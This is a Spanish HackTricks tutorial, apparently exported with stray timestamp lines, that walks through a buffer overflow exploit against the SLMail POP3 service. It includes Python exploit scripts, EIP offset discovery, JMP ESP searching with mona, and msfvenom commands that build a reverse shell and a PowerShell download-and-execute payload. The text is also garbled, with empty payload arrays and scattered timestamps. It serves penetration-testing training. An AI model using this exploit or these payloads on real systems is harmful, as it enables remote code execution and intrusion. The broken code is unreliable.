2024-07-18 17:32:15 +00:00
# Explotación de Windows (Guía Básica - Nivel OSCP)
2024-04-07 02:15:52 +00:00
2024-07-18 17:32:15 +00:00
{% hint style="success" %}
Aprende y practica Hacking en AWS: < img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)** ](https://training.hacktricks.xyz/courses/arte )< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
Aprende y practica Hacking en GCP: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line"> ](https://training.hacktricks.xyz/courses/grte )
2024-04-07 02:15:52 +00:00
2024-07-18 17:32:15 +00:00
< details >
2024-04-07 02:15:52 +00:00
2024-07-18 17:32:15 +00:00
< summary > Apoya a HackTricks< / summary >
2024-04-07 02:15:52 +00:00
2024-07-18 17:32:15 +00:00
* Consulta los [**planes de suscripción** ](https://github.com/sponsors/carlospolop )!
* **Únete al** 💬 [**grupo de Discord** ](https://discord.gg/hRep4RUj7f ) o al [**grupo de Telegram** ](https://t.me/peass ) o **síguenos** en **Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
* **Comparte trucos de hacking enviando PRs a los repositorios de** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) y [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ).
2024-04-07 02:15:52 +00:00
< / details >
2024-07-18 17:32:15 +00:00
{% endhint %}
2024-04-07 02:15:52 +00:00
## **Comienza instalando el servicio SLMail**
## Reiniciar el servicio SLMail
Cada vez que necesites **reiniciar el servicio SLMail** puedes hacerlo utilizando la consola de Windows:
net start slmail
2024-05-05 21:58:36 +00:00
![](< .. / . gitbook / assets / image ( 988 ) . png > )
2024-04-07 02:15:52 +00:00
2024-07-18 17:32:15 +00:00
## Plantilla de exploit básica en Python
2024-04-07 02:15:52 +00:00
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ip = ''
port = 110
buffer = 'A' * 2700
print "\nLaunching exploit..."
s.connect((ip, port))
data = s.recv(1024)
s.send('USER username' +'\r\n')
data = s.recv(1024)
s.send('PASS ' + buffer + '\r\n')
print "\nFinished!."
print "Could not connect to "+ip+":"+port
2024-07-18 17:32:15 +00:00
## **Cambiar la Fuente de Immunity Debugger**
2024-04-07 02:15:52 +00:00
2024-05-05 21:58:36 +00:00
Ir a `Options >> Appearance >> Fonts >> Change(Consolas, Blod, 9) >> OK`
2024-04-07 02:15:52 +00:00
## **Adjuntar el proceso a Immunity Debugger:**
**File --> Attach**
2024-05-05 21:58:36 +00:00
![](< .. / . gitbook / assets / image ( 869 ) . png > )
2024-04-07 02:15:52 +00:00
2024-05-05 21:58:36 +00:00
**Y presionar el botón START**
2024-04-07 02:15:52 +00:00
2024-07-18 17:32:15 +00:00
## **Enviar el exploit y verificar si EIP está afectado:**
2024-04-07 02:15:52 +00:00
2024-05-05 21:58:36 +00:00
![](< .. / . gitbook / assets / image ( 906 ) . png > )
2024-04-07 02:15:52 +00:00
2024-05-05 21:58:36 +00:00
Cada vez que se interrumpa el servicio, se debe reiniciar como se indica al principio de esta página.
2024-04-07 02:15:52 +00:00
## Crear un patrón para modificar el EIP
2024-05-05 21:58:36 +00:00
El patrón debe ser tan grande como el búfer que se utilizó para interrumpir el servicio anteriormente.
2024-04-07 02:15:52 +00:00
2024-05-05 21:58:36 +00:00
![](< .. / . gitbook / assets / image ( 420 ) . png > )
2024-04-07 02:15:52 +00:00
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000
Cambie el buffer del exploit y establezca el patrón y lance el exploit.
Debería aparecer un nuevo fallo, pero con una dirección EIP diferente:
2024-05-05 21:58:36 +00:00
![](< .. / . gitbook / assets / image ( 636 ) . png > )
2024-04-07 02:15:52 +00:00
Verifique si la dirección estaba en su patrón:
2024-05-05 21:58:36 +00:00
![](< .. / . gitbook / assets / image ( 418 ) . png > )
2024-04-07 02:15:52 +00:00
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 3000 -q 39694438
Parece que **podemos modificar el EIP en el desplazamiento 2606** del búfer.
2024-05-05 21:58:36 +00:00
Compruébalo modificando el búfer del exploit:
2024-04-07 02:15:52 +00:00
buffer = 'A'*2606 + 'BBBB' + 'CCCC'
Con este búfer, el EIP que se estrelló debería apuntar a 42424242 ("BBBB")
2024-05-05 21:58:36 +00:00
![](< .. / . gitbook / assets / image ( 874 ) . png > )
2024-04-07 02:15:52 +00:00
2024-05-05 21:58:36 +00:00
![](< .. / . gitbook / assets / image ( 92 ) . png > )
2024-04-07 02:15:52 +00:00
Parece que está funcionando.
2024-05-05 21:58:36 +00:00
## Verificar espacio para el shellcode dentro de la pila
2024-04-07 02:15:52 +00:00
2024-05-05 21:58:36 +00:00
600B deberían ser suficientes para cualquier shellcode potente.
2024-04-07 02:15:52 +00:00
Vamos a cambiar el búfer:
buffer = 'A'*2606 + 'BBBB' + 'C'*600
Lanza el nuevo exploit y verifica el EBP y la longitud del shellcode útil
2024-05-05 21:58:36 +00:00
![](< .. / . gitbook / assets / image ( 119 ) . png > )
2024-04-07 02:15:52 +00:00
2024-05-05 21:58:36 +00:00
![](< .. / . gitbook / assets / image ( 879 ) . png > )
2024-04-07 02:15:52 +00:00
Puedes ver que cuando se alcanza la vulnerabilidad, el EBP apunta al shellcode y que tenemos mucho espacio para ubicar un shellcode aquí.
En este caso tenemos **desde 0x0209A128 hasta 0x0209A2D6 = 430B.** Suficiente.
## Verificar caracteres no válidos
Cambia nuevamente el búfer:
badchars = (
buffer = 'A'*2606 + 'BBBB' + badchars
Los badchars comienzan en 0x01 porque 0x00 casi siempre es malo.
2024-05-05 21:58:36 +00:00
Ejecute repetidamente el exploit con este nuevo buffer eliminando los caracteres que se encuentren inútiles:.
2024-04-07 02:15:52 +00:00
Por ejemplo:
En este caso puedes ver que **no debes usar el carácter 0x0A** (nada se guarda en la memoria desde el carácter 0x09).
2024-05-05 21:58:36 +00:00
![](< .. / . gitbook / assets / image ( 111 ) . png > )
2024-04-07 02:15:52 +00:00
En este caso puedes ver que **se evita el carácter 0x0D** :
2024-05-05 21:58:36 +00:00
![](< .. / . gitbook / assets / image ( 1098 ) . png > )
2024-04-07 02:15:52 +00:00
## Encontrar un JMP ESP como dirección de retorno
!mona modules #Get protections, look for all false except last one (Dll of SO)
Debes **enumerar los mapas de memoria** . Busca alguna DLL que tenga:
2024-07-18 17:32:15 +00:00
* **Rebase: False**
* **SafeSEH: False**
* **ASLR: False**
* **NXCompat: False**
* **OS Dll: True**
2024-04-07 02:15:52 +00:00
2024-05-05 21:58:36 +00:00
![](< .. / . gitbook / assets / image ( 555 ) . png > )
2024-04-07 02:15:52 +00:00
2024-07-18 17:32:15 +00:00
Ahora, dentro de esta memoria debes encontrar algunos bytes JMP ESP, para hacerlo ejecuta:
2024-04-07 02:15:52 +00:00
!mona find -s "\xff\xe4" -m name_unsecure.dll # Search for opcodes insie dll space (JMP ESP)
!mona find -s "\xff\xe4" -m slmfc.dll # Example in this case
**Entonces, si se encuentra alguna dirección, elige una que no contenga ningún carácter malicioso:**
2024-05-05 21:58:36 +00:00
![](< .. / . gitbook / assets / image ( 605 ) . png > )
2024-04-07 02:15:52 +00:00
**En este caso, por ejemplo: \_0x5f4a358f**\_
## Crear shellcode
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 -f c -b '\x00\x0a\x0d'
msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('')\"" -f python -b '\x00\x0a\x0d'
Si el exploit no está funcionando pero debería (puedes ver con Immunity Debugger que se alcanza el shellcode), intenta crear otros shellcodes (msfvenom creará diferentes shellcodes para los mismos parámetros).
**Agrega algunos NOPS al principio** del shellcode y úsalo junto con la dirección de retorno para hacer un JMP ESP, y finaliza el exploit:
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ip = ''
port = 110
shellcode = (
buffer = 'A' * 2606 + '\x8f\x35\x4a\x5f' + "\x90" * 8 + shellcode
print "\nLaunching exploit..."
s.connect((ip, port))
data = s.recv(1024)
s.send('USER username' +'\r\n')
data = s.recv(1024)
s.send('PASS ' + buffer + '\r\n')
print "\nFinished!."
print "Could not connect to "+ip+":"+port
{% hint style="warning" %}
Existen shellcodes que se **sobrescribirán a sí mismos** , por lo tanto, es importante siempre agregar algunos NOPs antes del shellcode
{% endhint %}
## Mejorando el shellcode
Agregar estos parámetros:
EXITFUNC=thread -e x86/shikata_ga_nai
2024-07-18 17:32:15 +00:00
{% hint style="success" %}
Aprende y practica AWS Hacking: < img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)** ](https://training.hacktricks.xyz/courses/arte )< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
Aprende y practica GCP Hacking: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line"> ](https://training.hacktricks.xyz/courses/grte )
2024-04-07 02:15:52 +00:00
2024-07-18 17:32:15 +00:00
< details >
2024-04-07 02:15:52 +00:00
2024-07-18 17:32:15 +00:00
< summary > Apoya a HackTricks< / summary >
2024-04-07 02:15:52 +00:00
2024-07-18 17:32:15 +00:00
* Revisa los [**planes de suscripción** ](https://github.com/sponsors/carlospolop )!
* **Únete al** 💬 [**grupo de Discord** ](https://discord.gg/hRep4RUj7f ) o al [**grupo de telegram** ](https://t.me/peass ) o **síguenos en** **Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
* **Comparte trucos de hacking enviando PRs a los repositorios de** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) y [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ).
2024-04-07 02:15:52 +00:00
< / details >
2024-07-18 17:32:15 +00:00
{% endhint %}